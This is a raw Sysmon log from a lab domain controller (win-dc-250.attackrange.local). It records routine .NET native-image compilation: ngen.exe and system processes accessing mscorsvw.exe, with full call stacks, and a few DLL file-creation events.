13:21:25.569{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4555-6000-8E01-000000009A01}4536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:25.553{08A6967A-4555-6000-8D01-000000009A01}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8b8-0\Microsoft.GroupPolicy.Commands.dll2021-01-14 13:21:25.553 10341000x80000000000000005763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.350{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4555-6000-8D01-000000009A01}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.334{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4555-6000-8D01-000000009A01}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:25.334{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4555-6000-8D01-000000009A01}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.834{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9A01-000000009A01}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.819{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9A01-000000009A01}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.819{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9A01-000000009A01}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.740{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9901-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.725{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9901-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.725{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9901-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.694{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9801-000000009A01}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.694{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9801-000000009A01}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.678{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9801-000000009A01}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.647{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9701-000000009A01}5080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.600{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9701-000000009A01}5080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.600{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9701-000000009A01}5080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.334{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9601-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.287{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9601-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.287{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9601-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.256{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9501-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.240{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9501-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.240{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9501-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:26.225{08A6967A-4556-6000-9401-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1350-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-01-14 13:21:26.225 10341000x80000000000000005788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.194{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9401-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.178{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9401-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 